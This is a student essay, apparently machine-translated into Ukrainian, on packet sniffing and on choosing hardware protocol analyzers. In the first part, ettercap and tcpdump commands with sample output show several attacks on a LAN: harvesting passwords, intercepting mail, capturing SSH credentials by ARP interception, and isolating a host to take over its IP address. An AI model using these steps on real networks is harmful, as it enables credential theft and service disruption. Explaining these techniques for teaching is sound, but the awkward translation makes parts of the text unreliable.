ПЕРЕЛІК ДИСЦИПЛІН:
  • Адміністративне право
  • Арбітражний процес
  • Архітектура
  • Астрологія
  • Астрономія
  • Банківська справа
  • Безпека життєдіяльності
  • Біографії
  • Біологія
  • Біологія і хімія
  • Ботаніка та сільське гос-во
  • Бухгалтерський облік і аудит
  • Валютні відносини
  • Ветеринарія
  • Військова кафедра
  • Географія
  • Геодезія
  • Геологія
  • Етика
  • Держава і право
  • Цивільне право і процес
  • Діловодство
  • Гроші та кредит
  • Природничі науки
  • Журналістика
  • Екологія
  • Видавнича справа та поліграфія
  • Інвестиції
  • Іноземна мова
  • Інформатика
  • Інформатика, програмування
  • Юрист по наследству
  • Історичні особистості
  • Історія
  • Історія техніки
  • Кибернетика
  • Комунікації і зв'язок
  • Комп'ютерні науки
  • Косметологія
  • Короткий зміст творів
  • Криміналістика
  • Кримінологія
  • Криптология
  • Кулінарія
  • Культура і мистецтво
  • Культурологія
  • Російська література
  • Література і російська мова
  • Логіка
  • Логістика
  • Маркетинг
  • Математика
  • Медицина, здоров'я
  • Медичні науки
  • Міжнародне публічне право
  • Міжнародне приватне право
  • Міжнародні відносини
  • Менеджмент
  • Металургія
  • Москвоведение
  • Мовознавство
  • Музика
  • Муніципальне право
  • Податки, оподаткування
  •  
    Бесплатные рефераты
     

     

     

     

     

     

         
     
    Визначення підозрілих пакетів, аналіз протоколів мережі
         

     

    Інформатика, програмування


    Міністерство вищої і середньої спеціальної

    Освіти Республіки Узбекистан

    Ташкентський Державний Технічний Університет

    Факультет: "Комп'ютерні технології"

    Кафедра: «Комп'ютерні системи та мережі »

    РЕФЕРАТ

    На тему:« Визначення підозрілих пакетів, аналіз протоколів мережі »

    | Виконав: | маг. гр. 51м-02ІБ |
    | | Д. Бобокулов |
    | | |
    | Прийняв: | доц. Карімов М.М. |

    Ташкент-2002-03

    Зміст:

    Введення. 2.

    Програмні засоби аналізу підозрілих пакетів на прикладі ОС Linux. 3.

    Апаратні засоби аналізу пакетів (протоколів). Аналізатори. 8.

    Критерії вибору аналізатора пакетів. 11.

    Висновок. 16.

    Список використаних джерел. 17.

    Введення.

    В даний час апаратна архітектура Ethernet завоювала великучастину ринку при створенні локальних мереж, хоча існують і іншіапаратні рішення не на IEEE 802.3, такі як FDDI, Token Ring (802.5),
    ARCNET, WAN, ATM та інші. Відносна недороговізна в поєднанні зтехнічною швидкістю передачі даних у 10, 100 і 1000 мегабіт в секундусприяє її популярності. Мережа Ethernet працює як магістраль, черезяку будь-який вузол може пересилати пакети на інший вузол, підключений дотого ж сегменту мережі. Для перенаправлення пакетів з однієї мережі в іншунеобхідно користуватися репітер, світчей або концентратором. Процеспередачі фреймів забезпечує міжмережевий протокол, який не залежить відобладнання та представляє різні мережі в одну мережу. Але привикористанні цього протоколу немає гарантій, що пакет досягне адресата,але вирішення цього завдання забезпечує протокол TCP/IP, що займаєтьсягарантованою доставкою пакетів. TCP не єдиний протокол у стекупротоколів TCP/IP, існує ще протокол UDP, який багато швидшепротоколу TCP, тому що не створює і не закриває сеанс з'єднання, а вузол здопомогою його просто відправляє дані в дейтаграмма іншим вузлам у мережі.
    Пакет, який надійшов у широкомовної мережі одним з вузлів, приймаєтьсяусіма що знаходяться в цьому сегменті мережі машинами, але тільки вузолпризначення, зазначений у заголовку пакету, "дивиться" на нього і починає йогообробку (відноситься і до TCP і до UDP протоколів).

    Перехоплювачі мережевих пакетів можуть не тільки використовуватисяадміністратором мережі для перевірки і детального аналізу правильностіконфігурації мережевого програмного забезпечення, але і являють собоюсерйозну загрозу, оскільки можуть перехоплювати і розшифровувати імена тапаролі користувачів, конфіденційну інформацію, порушувати роботуокремих комп'ютерів і мережі в цілому.

    Аналізатори пакетів відносяться до класу інструментальних програмнихкоштів для моніторингу мережевого трафіку і виявлення деяких типівмережевих проблем. За замовчуванням мережний інтерфейс бачить пакункипризначені тільки для нього. Однак аналізатори встановлюють його врежим прийому всіх пакетів - promiscuous mode, прослуховують мережу ізмушують мережевий інтерфейс приймати всі фрейми, незалежно від того,кому вони адресовані в мережі.

    Програмні засоби аналізу підозрілих пакетів на прикладі ОС

    Linux.

    Для установки "вручну" мережевого інтерфейсу в широкомовний режимнеобхідно включити прапор PROMISC: ifconfig eth0 promisc; для відключенняpromiscuous mode: ifconfig eth0-promisc.

    Яскравим прикладом інструментального програмного засобу служитьпрограма tcpdump, написана веном Якобсоном і поставляються зараз зібагатьма дистрибутивами. Приклад використання tcpdump:

    tcpdump-i eth0-n-vv-w/root/tcpdump.log

    де:

    -I - мережний інтерфейс;

    -n - числовий робимо висновок адрес і номерів портів;

    -vv - дуже докладний висновок;

    -w - запис логу у файл.

    Щоб прочитати перехоплений трафік з логу (виводимо не на консоль, а вфайл):

    tcpdump-r/root/tcpdump.log>/root/tcpdump0.log

    Фрагмент роботи tcpdump:

    14:06:28.250082 B 192.168.5.17.1445> 255.255.255.255.8167: udp 21

    14:07:24.126187> midian> 192.168.5.23: icmp: echo request

    14:07:24.126667 < 192.168.5.23> midian: icmp: echo reply
    Перший рядок показує, що 192.168.5.17 користується програмою дляспілкування в локальній мережі (робить широкомовна запит, використовуєтьсяпорт 8167), другому і третьому вказують, що хост midian перевіряє машину з
    IP-адресою 192.168.5.23 програмою ping.
    Аналізатори пакетів, безсумнівно, корисні для вирішення адміністратором мережівідомих і невідомих проблем, але є й зворотний бік медалі:нерозбірливий режим прийому пакетів дозволяє зловмисникові отримувати весьтрафік в мережі і фільтрувати його на наявність імен, паролів користувачів,незашифрованих листів і т.д. Тепер все обмежується тільки фантазієюхакера.
    Ettercap

    Особливості цього сніффер:

    . працює на Linux 2.0.x, Linux 2.2.x, Linux 2.4.x, FreeBSD 4.x,

    OpenBSD 2. [789], NetBSD 1.5.x, Mac OS (darwin 1.3);

    . перехоплення і розшифровка паролів TELNET, SSH1, FTP, POP, LOGIN, ICQ,

    SMB, MySQL, HTTP, HTTPS, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5,

    IMAP 4, VNC;

    . возможнось вставки символів у встановлений з'єднання - буде відбуватися емуляція команд сервера і відповідей клієнта (працює тільки в інтерактивному режимі);

    . невимогливість до бібліотек libpcap, libnet, libnids на відміну від інших сніффер;

    . підтримка плагінів; можливість написання власних плагінів;

    . текстовий і псевдографічний (заснований на ncurses) інтерфейси;

    . різні види прослуховування; можливість використання фільтрів;

    . робота в мережі з активними інтелектуальними хабами.
    Установка сніффер:

    ./Configure

    make

    make install

    Встановлення плагінів:

    make plug - ins

    make plug-ins_install
    Деякі опції сніффер:

    a-,-s,-m - різні види прослуховування;

    N-- запускати сніффер без псевдографіки;

    z-- запуск в спокійному режимі;

    -d - не перетворювати IP-адреси в імена;

    -i - мережевий інтерфейс;

    -l - вивести список хостів у мережі ;

    -C - збирати всі імена і паролі користувачів;

    -f - визначення операційної системи віддаленого хоста;

    -p - робота з плагінами;

    -L - записувати в лог, що має формат: рік: місяць: день-collected-pass.log
    Розглянемо деякі види використання цього сніфер. Перехоплює всіімена користувачів і паролі в нашому сегменті мережі і записуємо в лог:

    ettercap-NdzsCLi eth0

    Після недовгого очікування отримуємо необхідне;)

    14:43:45 192.168.5.29:1755 212.48.140.154:80 www

    USER: leshii

    PASS: softerra

    http://www.nm.ru/gateway_chat. shtml

    Визначаємо операційну систему хоста, наприклад, з IP-адресою 192.168.5.24:

    ettercap - Ndzsfi eth0 192.168.5.24

    Дивимося встановлені у нас плагіни і описи до них:

    ettercap - N-p list

    Для активації плагіна (наприклад, пропінгуем якийсь хост):

    ettercap - N-p ooze 192.168.5.33

    Найбільш цікавим плагіном є leech. Він ізолює віддалений хост відмережі. Приклад роботи цього плагіна:

    Спочатку перевіримо, "живий" чи хост:

    andrushock # ping-v-c 4 192.168.5.23

    PING 192.168.5.23 (192.168.5.23): 56 data bytes

    64 bytes from 192.168.5.23: icmp_seq = 0 ttl = 128 time = 0.945 ms

    64 bytes from 192.168.5.23: icmp_seq = 1 ttl = 128 time = 0.562 ms

    64 bytes from 192.168.5.23: icmp_seq = 2 ttl = 128 time = 0.524 ms

    64 bytes from 192.168.5.23: icmp_seq = 3 ttl = 128 time = 0.520 ms
    Запускаємо плагін (операційна система хоста жертви - win98se):

    andrushock # ettercap-Ndp leech 192.168.5.23

    Спостерігаємо за процесом роботи:

    Your IP: 192.168 .5.21 MAC: 00:50: BF: 4A: 48: F3 Iface: ed0

    Starting./ec_leech.so plugin ...

    Building host list for netmask 255.255.255.0 , please wait ...

    Sending 255 ARP request ...

    Listening for replies ...

    Isolating host 192.168.5.23 ... Press return to stop

    Чекаємо пару хвилин і сміливо натискаємо ^ C, потім перевіряємо роботу плагіна:

    andrushock # ping-v-c 4 192.168.5.23

    PING 192.168 .5.23 (192.168.5.23): 56 data bytes

    --- 192.168.5.23 ping statistics ---

    4 packets transmitted, 0 packet received, 100% packet loss

    andrushock #
    Мережевий інтерфейс на машині жертви на деякий час перестає працювати,хоча операційна система і запущені програми функціонують у тому жнормальному режимі. Але цього "деякого" часу вистачає, наприклад, длятого, щоб дістати собі IP-адресу жертви:

    ifconfig eth0 down

    ifconfig eth0 inet 192.168.5.23

    ifconfig eth0 up


    І набираємо команду, щоб упевнитися про наш "новому" IP-адресу:ifconfig eth0
    Перехоплення незашифрованих поштових повідомлень. Вид запису:./Ettercap-Nzds
    :

    Приклад перехоплення вихідних повідомлень:

    ./Ettercap-Nzds ANY: 25 ANY>/root/sniff.smtp

    І дивимося через деякий час, що попалося в наші мережі (наводжу частиналогу):

    Сat/root/sniff.smtp

    Your IP: 192.168.5.21 with MAC: 00:50: BF: 4A: 48: F3 on Iface: eth0

    Press 'h' for help ...

    Sniffing (IP based): ANY: 0 ANY: 25

    18:19:14 192.168.5.23:1030 -> 80.68.244.5:25

    18:19:14 80.68.244.5:25 -> 192.168.5.23:1030

    Далі йде процес аутентифікації, лист від кого, адреса реципієнта, їхвалідність і сам текст листа.

    To: [email protected].

    Subject: test.

    Mime-Version: 1.0. < p> Content-Type: text/plain; charset = us-ascii.

    Content-Transfer-Encoding: 7bit.

    .

    Hello andrushock,.

    .

    Test for Softerra.

    .

    -.

    Best regards,.

    Noname mailto: ******pisem.net.

    Далі повідомлення демона про прийняття листа до відправки та завершення поштовимсервером з'єднання.
    Для перехоплення що входять в локальну мережу електронних листів використовуємо:

    ./Ettercap-Nzds ANY: 110 ANY>/root/sniff.pop3

    або

    ./ettercap-Nzds ANY: 143 ANY>/root/sniff.imap4
    Приклад перехоплення паролів під час сесії SSH:

    На одній машині 192.168.5.21 варто ettercap (назвемо зловмисник), надруга 192.168.5.4 sshd (назвемо сервер), а на третьому 192.168.5.22
    SecureCRT (назвемо клієнт).

    ./Ettercap-Ndl - виводимо список всіх ip з МАС-адресами машин в сегментілокальної мережі, запам'ятовуємо тільки МАС-адресу сервера і клієнта. Запускаємосніффер на прослуховування і чекаємо коли клієнт ініціалізує сеанс Secure
    Shell з сервером і почнеться процес аутентифікації. У цьому випадку машиназловмисника є "мостом", через який буде проходити ірозшифровуватися на льоту проходить весь трафік між клієнтом і сервером.

    Вид запису:

    ./ettercap-za


    ./ettercap-za 192.168.5.4 192.168.5.22 00:50: BF: 03: BC: 47 00: A0: 24:93:61:3 D

    Наводжу "текстовий скріншот" < p>ettercap 0.5.4

    SOURCE: 192.168.5.22? Filter: OFF

    doppleganger - illithid (ARP Based) - ettercap

    DEST: 192.168.5.4? Active Dissector: ON


    ??? hosts in this LAN (192.168.5.21: 255.255.255.0)

    1) 192.168.5.22:1252?? 192.168.5.4:22 | silent | SSH decrypt


    Your IP: 192.168.5.21 MAC: 00:50: BF: 4A: 48: F3 Iface: ed0 Link: not tested

    USER: testuser

    PASS: softerra
    У лівому нижньому куті спостерігаючи вже розшифровані ім'я користувача і йогопароль. Примітка: мережний інтерфейс дійсно ed0, тому що програматестувалася в операційних системах Linux і FreeBSD.
    Постійно виходять нові версії Ettercap, в яких виправляються помилки
    (наприклад, лише кілька версій тому виправили "глюк", коли післяроботи мережевий інтерфейс, на якому був запущений цей сніффер падав),додаються нові можливості і перенесення на інші операційні системи, увідміну від програм описаних нижче, робота над якими вже давно неведеться, хоча в даний час ці аналізатори протоколів є найбільшпопулярними.sniffit Можливості цього сніффер:

    . працює на LINUX, SunOS/Solaris, Irix, FreeBSD, BSDi, DEC/OSF,

    NetBSD;

    . перехоплення паролів FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP,

    SNMP, LDAP, Rlogin, RIP, OSPF, PPTP, MS-CHAP, NFS, VRRP, YP/NIS,

    SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker,

    Citrix ICA, Symantec pcAnywhere, NAI, Sniffer, Microsoft SMB, Oracle

    SQL * Net, Sybase and Microsoft SQL;

    . використання конфігураційних файлів для створення фільтрів;

    . має текстовий і псевдографічний (заснований на ncurses) інтерфейси.dsniff Примітка: цю версію сніффер я не зміг поставити на Red Hat Linux
    7.0, тому довелося качати новішу, але beta, де як раз виправленапомилка компонування для дистрибутивів Red Hat Linux 6,7.
    Можливості цього сніффер: працює на OpenBSD (i386), Redhat Linux (i386), Solaris (sparc),

    FreeBSD, Debian Linux, Slackware Linux, AIX, HP-UX;

    . перехоплення паролів FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP,

    SNMP, LDAP, Rlogin, RIP, OSPF, PPTP, MS-CHAP, NFS, VRRP, YP/NIS,

    SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker,

    Citrix ICA, Symantec pcAnywhere, NAI, Sniffer, Microsoft SMB, Oracle

    SQL * Net, Sybase, Microsoft SQL;

    . Також в цей пакет входить набір "утиліт" для перехоплення повідомлень AOL

    Instant Messenger, ICQ 2000, IRC, Yahoo Messenger chat, прослуховування ssh трафіку, флуда локальної мережі випадковими MAC-адресами, обмеження пропускної здатності з'єднання, обриву заданого TCP-з'єднання та ін;

    . не має псевдографічний інтерфейсу.

    Апаратні засоби аналізу пакетів (протоколів).


    Аналізатори протоколів передачі данних.Сегодня обладнання передачі данихможна знайти практично в будь-якому офісі і на кожному промисловому підприємстві.
    В офісі це різні периферійні пристрої для персональних комп'ютерівта обладнання передачі даних з корпоративних або територіальним мереж,на виробництві - системи збору інформації та управління. Різноманітністьпристроїв, що обмінюються даними, росте з кожним днем, проте набірвикористовуваних при цьому інтерфейсів не зазнав істотних змін. Дотого ж із часом галузь виробила безліч пристосувань іінструментів для тестування інтерфейсів на різному рівні і діагностикипроблем взаємодії пристроїв.

    Один з найстаріших інтерфейсів, RS-232, має величезне числорізновидів. Попри те, що будь-який фахівець з обчислювальноїтехніці або мікроконтролера знає його цокольовка напам'ять, протепроблеми можуть виникнути вже на етапі підключення пристроїв один до одного.
    Особливо часто це буває викликано відсутністю інформації про те, якікеруючі сигнали використовуються, до якого типу відносяться пристрої
    (DTE/DCE), які швидкість і формат передачі даних. Комплект найпростішихпристроїв, що буде описано нижче, істотно полегшує роботу тим,кому доводиться мати справу з цим інтерфейсом.
    | |


    Для того щоб виготовити перехідник, зовсім не обов'язково користуватисяпаяльником - досить простого пристосування, за допомогою якогоконтакти одного роз'єму можна було б поєднати з контактами іншого впотрібної послідовності звичайним проводом без пайки. Такий міні-кросдозволяє не тільки створити пристрій з потрібною схемою, але і підібратипотрібну схему з'єднання.
    | |


    Щоб зрозуміти, чому ж обмін не відбувається, зовсім не обов'язково шукатианалізатор - для діагностики достатньо простої індикатора, якщо віндозволяє провести моніторинг основних сигналів. Його двоколірні світлодіодиможуть ідентифікувати високий/низький рівень сигналу, його відсутність талінії, за якими здійснюється передача даних.
    Іноді функції міні-кросу і індикатора об'єднуються. Однак ринокпропонує і більш універсальні прилади (їх англійська назва - breakoutbox, спеціального російського терміна поки що немає, тому ми будемо називати їхпросто тестерами). Достаток різновидів цього виду приладів вражає.
    Крім кроссіровкі та індикації стану ліній вони дозволяють відключати абопідключати окремі лінії в процесі налагодження,
    | |

    подавати на них сигнали певного рівня, фіксувати наявність на лініяхкоротких імпульсів. , Що з'явилися за часів розквіту інтерфейсу RS-232/V.24,такі прилади стали настільки популярні, що сьогодні виробникамивипускається широка гама моделей для послідовних синхронних іасинхронних (RS-422/423, RS-449/V.36, X.21, V.35), а також паралельного
    (Centronics) інтерфейсів.
    Більшість моделей забезпечено вбудованим тестером кабелів для перевірки абовизначення електричної схеми. Деякі моделі мають вбудованиймультиметр.
    | |


    Наступними за рівнем складності є пристрої, що виконують функціїтестера частоти помилкових бітів/блоків (bit/block error rate, BER/BLER).
    Вони дозволяють виміряти параметри, які використовуються для оцінки якості каналу ійого діагностики (кількість отриманих блоків; частку бітів/блоків,з помилками; суму секунд, коли спостерігалися помилки; число випадківвтрат синхронізації; суму секунд, коли мали місце збої синхронізації;кількість помилок парності і фреймінг, а також час виконання тесту ічастоту появи помилок в бітах/блоках). Гарні прилади мають вбудованийгенератор тестових послідовностей для синтезу
    | |

    певних наборів символів (найбільш часто використовуютьсяпослідовності «quick brown fox» і «barber poles») або передачіщо задається користувачем набору символів. Деякі прилади мають опціїдля тестування статистичних мультиплексорів (опитування пристроїв іуправління потоком Xon/Xoff), моніторингу каналів SDLC, роботи зпротоколами SNA і X.25 і т. п.
    Особливе місце займають пристрою реєстрації, так звані Логгер, дляфіксації та запису даних у реальному масштабі часу. Збережені в їхвнутрішньому буфері дані можна переглянути на дисплеї Логгер абороздрукувати з перетворенням в потрібну кодову таблицю (наприклад, ASCII).
    | |


    Більшість Логгер реалізує і всі описані вище функції. НайпотужнішіЛоггер мають алфавітно-цифровий дисплей і повнорозмірну клавіатуру дляредагування та моделювання повідомлень. Підготовлені таким чиномповідомлення можуть використовуватися при налагодженні різних пристроїв.
    Окремо стоять більш потужні (і суттєво дорожчі) прилади дляаналізу протоколів передачі даних з глобальних мереж (WAN). Взагалі всучасному світі, після переходу телефонії на цифрові принципи, кордонміж даними цифрових телефонних систем і даними обчислювальних мереж
    | |

    стає все більш розпливчатою. У разі PDH/SDH на канальному рівнівідмінності між ними взагалі не існують. Вони з'являються на більш високомурівні, де використовуються специфічні протоколи. Оскільки всі аналізаторивиконані на базі звичайних компьютеров (як правило, це ноутбуки з наборомдодаткових інтерфейсних карт), то майже завжди можна знайти декількаоднотипних моделей, що відрізняються конкретним набором протоколів і ціною.
    Деякі виробники йдуть по шляху створення сверхуніверсальних приладів,які можуть використовуватися як у телефонії, так і при передачі даних.
    Інші пропонують вузькоспеціалізовані прилади, але за меншу ціну.
    | |


    Більшість сучасних приладів цього типу дозволяє аналізувати відразудекілька протоколів глобальних мереж, таких, як X.25, PPP, SLIP,
    SDLC/SNA, frame relay, SMDS, ISDN, протоколи мостів/маршрутизаторів (3Com,
    Cisco, Bay Networks та інші). Такі аналізатори дозволяють вимірюватирізні параметри протоколів, аналізувати трафік в мережі, перетворенняміж протоколами локальних і глобальних мереж, затримку на маршрутизаторахпри цих перетвореннях і т. п. Більш досконалі прилади передбачаютьможливість моделювання та декодування протоколів глобальних мереж,
    «Стресового» тестування, вимірювання максимальної пропускної спроможності,тестування якості послуг, що надаються. Варто відзначити і той факт, щоз метою універсальності майже всі аналізатори протоколів глобальних мережреалізують функції тестування ЛВС і всіх основних інтерфейсів. Деякіприлади здатні здійснювати аналіз протоколів телефонії. А самісучасні моделі можуть декодувати і представляти в зручному варіанті всісім рівнів OSI. Поява ATM призвело до того, що виробники сталіпостачати свої аналізатори засобами тестування цих мереж. Такі приладиможуть проводити повне тестування мереж АТМ рівня E-1/E-3 з підтримкоюмоніторингу та моделювання. Дуже важливе значення має набір сервіснихфункцій аналізатора. Деякі з них, наприклад, можливість віддаленогоуправління приладом, просто незамінні.
    | |


    Таким чином, сучасні аналізатори протоколів WAN/LAN/ATM дозволяютьвиявити помилки в конфігурації маршрутизаторів і мостів; встановити типтрафіку, що пересилається з глобальної мережі; визначити який використовується діапазоншвидкостей, оптимізувати співвідношення між пропускною здатністю ікількістю каналів; локалізувати джерело неправильного трафіку; виконатитестування послідовних інтерфейсів і повне тестування АТМ;здійснити повний моніторинг і декодування основних протоколів з будь-якогоканалу; аналізувати статистику в реальному часі, включаючи аналіз трафікулокальних мереж через глобальні мережі.

    Критерії, за якими слід вибирати аналізатор протоколів

    Будь-який мережевий адміністратор, який одного разу зіткнувся з завданнямтрансформації мережі, скаже, що нові технології привносять не менше новихпроблем, ніж вирішують. Аналізатор протоколів дозволяє виявляти іусувати проблеми існуючої мережі, а також спростити процес переходу донової технології. Завдяки аналізатору можна не тільки оперативноусувати проблеми в міру їх виникнення, але і попереджати їхпояву.
    Аналізатори протоколів - це "гарячий" продукт, який, природно,досить широко представлений на ринку телекомунікацій. Крім того, цедосить дорогий пристрій. Як вибрати найбільш підходящий? Необхіднийсистемний підхід. Виділяють ряд критеріїв, за якими оцінюють аналізаторипротоколів:

    . Можливість декодування мережевих протоколів і підтримки змінних інтерфейсів.

    . Якість інтерфейсу програмного забезпечення.

    . Наявність багатоканальні.

    . Можливість інтеграції з PC.

    . Розмір і вага.

    . Співвідношення ціни та послуг, що надаються.
    Розглянемо представлені на ринку телекомунікацій аналізатори протоколіві оцінимо їх з точки зору цих критеріїв. Проведені автором дослідженняринку показали, що найбільше поширення на російському ринкуаналізаторів отримали моделі Domino і DA-30 фірми Wandel & Golterman, J2300Aфірми Hewlett-Packard, Fireberd 300 і Fireberd 500 фірми TTC
    (Telecommunication Technic Corporation), Sniffer компанії Network General ісерія продуктів компанії RADCOM (RC-88WL, RC-100WL).

    Підтримувані протоколи та фізичні інтерфейси

    Підтримувані протоколи і можливість фізичного приєднання дорізним фізичним інтерфейсів визначають сферу і широту застосуванняаналізтора.

    Фізичні інтерфейси

    До числа традиційно підтримуваних фізичних інтерфейсів входять V.35, RS-
    232/V.24, RS-449, RS-530, X.21/V.11, які звичайно включаються в базовийкомплект поставки аналізатора. Інтерфейси Е1, Т1, Ethernet, Token Ringє додатковими і звичайно не входять в базовий комплект. Завдякимодульній структурі конструкції аналізатора, завжди залишається можливістьйого оснащення необхідними фізичними інтерфейсами. Відсутність підтримкибудь-який з цих інтерфейсів або невиправдано висока вартість, можевиявитися слабкою стороною аналізатора. Модель Domino фірми Wandel & Goltermanне підтримує інтерфейс Т1, що для російських умов не єістотним, однак, відсутність підтримки інтерфейсу Е1 моделями Fireberd
    300, Fireberd 500 фірми TTC може стати серйозним обмеженням для їхвикористання.

    Протоколи

    У міжнародній класифікації мережеві протоколи поділяються на класи,або серії, які містять протоколи з загальними ознаками. Аналіз мережевихпротоколів - центральне завдання аналізатора, тому природнимвимогою системного адміністратора є підтримка максимальногокількості протоколів. На практиці ж виявляється, що можливість роботиряду аналізаторів до частини протоколів з класу не завжди має на увазіпідтримку цілого класу.
    Найбільшою повнотою можливостей роботи з мережевими протоколами відрізняютьсямоделі J2300А компанії Hewlett-Packard, RC-88WL і RC-100WL фірми RADCOM. Насьогоднішній день вони підтримують декодування близько 140 мережевихпротоколів, що є практично повним списком використовуванихпротоколів. Наприклад, протокол Apollo Domain підтримує тільки модель
    J2300A Hewlett Packard, а протокол RND - тільки зазначені моделі фірми
    RADCOM.
    Перелік протоколів, що підтримуються іншими аналізаторами, не так великий.
    Моделі Domino, DA-30 компанії Wandel & Golterman не підтримують такіпротоколи серії TCP/IP, як TELNET, FTP, TFTP, і окремі протоколи іншихгруп.

    Інтерфейс програмного забезпечення

    Чому інтерфейс програмного забезпечення є таким важливим фактором?
    Чим "дружні" оболонка програмного забезпечення, тим ефективнішеробота адміністратора, крім того, графічний віконний інтерфейссприяє швидкого освоєння програмного забезпечення і дозволяєадекватно сприймати що видається аналізатором інформацію. У результатіширокого розповсюдження середовища MS-Windows графічний віконний інтерфейсстав деяким стандартом для комп'ютерних програм. Однак кожна фірма -виробник аналізаторів протоколів використовує свій власний підхід доорганізації програмного інтерфейсу.
    Компанія RADCOM спочатку орієнтувалася на графічний віконний інтерфейс
    (вихід перших моделей аналізаторів в 1991р. збігся з моментом визнання MS-
    Windows). Природно, що з усуненням системних помилок в середовищі MS-
    Windows усувалися помилки і в програмному забезпеченні аналізатора. Заразпрограмне забезпечення RADCOM стало високонадійним і зрілим продуктом. Дляаналізаторів Domino і DA-30 фірми Wandel & Golterman графічний віконнийінтерфейс є досить новим (використовується в них, починаючи з червня
    1995 р.) і не завжди зручний для роботи. Аналізатори протоколів Snifferкомпанії Network General і J2300A компанії Hewlett-Packard пропонують дварізних типу програмного забезпечення: графічний віконний інтерфейс --для роботи з локальними мережами, інтерфейс під операційне середовище MS-DOS --для роботи з розподіленими мережами. Останній тип ПО ніяк не можевважатися передовим, оскільки ускладнює роботу оператора і накладаєдодаткові обмеження на своє використання.

    багатоканальність

    Наявність або відсутність функції одночасної роботи з декількома каналамидуже часто є визначальним при класифікації аналізатора. Яквідомо, у класі протокольних аналізаторів виділяють підклас з більшбагатими функціональними та дослідницькими можливостями (Research and
    Development, або R & D Analyzers). У якісних моделях аналізаторівпідтримка роботи з декількома каналами зазвичай має на увазі наявністьдодаткової функції імітації. Ця функція в сукупності збагатоканальність дозволяє використовувати аналізатор одночасно якгенератора перевірочних послідовностей і тестуючого обладнання.
    Слід зазначити, що далеко не всі аналізатори, представлені на ринку (а їх більше десятка! ), Підтримують багатоканальність.
    Аналізатори компаній RADCOM і Wandel & Golterman повною мірою підтримуютьцю функцію. Наприклад, RADCOM пропонує дуже практичне рішення: наявністьпідтримки одночасної роботи з двома фізичними каналами в сукупностіз принципом модульності фізичних інтерфейсів дозволяють отриматипрактично будь-яку необхідну конфігурацію. Крім найчастіше використовуєтьсяконфігурації - інтерфейс локальної мережі плюс інтерфейс розподіленої --можна використати інтерфейси двох локальних або двох розподілених мереж.

    Модель Fireberd 300 фірми TTC дозволяє одночасно працювати c каналамирозподілених і локальних мереж, але не більше ніж з одним видом впевний проміжок часу. Цей аналізатор не може одночаснотестувати два різних сегменту локальної мережі або два канали зв'язкурозподіленої мережі. Мережеві адміністратори позбавляються дуже важливою іприродної можливості - аналізувати трафік суміжних сегментів мережі, апри необхідності - генерувати перевірочні послідовності на одномусегменті мережі та перевіряти їх на сусідньому коштами одного пристрою.
    Моделі Sniffer компанії Network General і J2300A компанії Hewlett-Packardне підтримують одночасну роботу з декількома каналами. На моментнаписання статті компанія Hewlett-Packard оголосила, що підтримка функціїбагатоканальність повинна бути реалізована нею найближчим часом. Проте вартовраховувати той факт, що не завжди нові продукти відповідають вимогам,виходячи з яких вони створювалися, і може пройти якийсь час, першчим будуть усунені їх недоліки та проведені доробки.

    Інтеграція з персональним комп'ютером

    Складовою частиною будь-якого аналізатора протоколів є персональнийкомп'ютер (клас тестерів фізичного рівня виходить за рамки розглядуцієї статті). Відомі два принципових підходи до організаціївзаємодії між аналізатором протоколів і ПК. Перший полягає вінтеграції аналізатора і комп'ютера на базі єдиного пристрою, другого,більш сучасний, - в їх спільному використанні, як незалежнихскладових. В останньому випадку вдається строго розділити функції,виконувані кожним пристроєм. Такий підхід дозволяє здійснюватинезалежну модернізацію складових і є особливо актуальним приіснуючому розвитку комп'ютерних технологій.
    Аналізатори можуть бути апаратно реалізовані як внутрішня плата дляперсонального комп'ютера і як окремий пристрій. Великий недоліканалізаторів, реалізованих у вигляді внутрішньої плати, може проявитися прибажанні переставити його в ПК з іншого шиною. Для аналізаторів Sniffer навітьіснують підрозділи на Type I, Type II, Type III, якіпризначені для шин ISA, EISA і т.д. Ще одним обмеженням, якепов'язане з таким підходом, є вимога двох вільних слотів, щоособливо критично для комп'ютерів типу Notebook. Більш поширенимпідходом є реалізація аналізатора протоколів у вигляді окремогопристрою. З цього напрямку, у свою чергу, можна виділити випадкиінтеграції функцій аналізатора і персонального комп'ютера. В аналізаторі DA-
    30 фірми Wandel & Golterman використовується вбудований PC 386/16Mhz, а в моделі
    Fireberd 500 фірми ТТС - PC 486/33Mhz. За нинішнього розвиткукомп'ютерних технологій такий підхід може стати серйозним недоліком,оскільки практично виключає можливість збільшення потужності абооновлення комп'ютера.
    Найбільш життєздатним і рентабельним вважається підхід, що забезпечуєвиконання спеціальних операцій (захоплення, декодування, емуляції) здопомогою засобів незалежного пристрою, а відображення і обробкурезультатів мережевого тестування - засобами окремого персональногокомп'ютера. Компанія RADCOM використовує архітектурний підхід, в якомуфункції аналізатора протоколів і комп'ютера строго розділені. Комп'ютерз'єднується з аналізатором через паралельний порт і служить для керуванняі відображення результатів мережевого тестування. При такому підходізнімаються будь-які обмеження на використовуваний комп'ютер (єдиненакладає обмеження - вимога підтримки MS-Windows).

    Портативність

    Розмір і вага - це ті параметри, які не є суттєвими для
    "важкого" мережевого устаткування, що встановлюються стаціонарно, але,навпаки, важливі при використанні протокольного аналізатора. Проблема можевиникнути в будь-якому сегменті мережі, і чим компактніше і легше аналізатор, тимзручніше він буде в експлуатації. Використання паралельної RISC -архітектури і процесора Intel 960i дозволило компанії RADCOM домогтисявисокої продуктивності при портативності моделей за розміром і вагою. Прирозмірі 21,6 х27, 8х2, 5 см (можна порівняти з розмірами книги формату А4 обсягом
    100 сторінок) Аналізатор важить всього 1,5 кг. За даним параметром цейаналізатор можна порівняти тільки з моделлю Domino, мінімальний вага якоїстановить 1,3 кг для одноканальної і 2,6 кг для двоканальної модифікації.
    Sniffer складно охарактеризувати за цим параметром, оскільки його ваговіхарактеристики повністю залежать від використовуваного з ним комп'ютера. Іншіаналізатори протоколів звичайно в півтора-два рази більше і важать близько 8 кг.

    Співвідношення ціни та послуг, що надаються

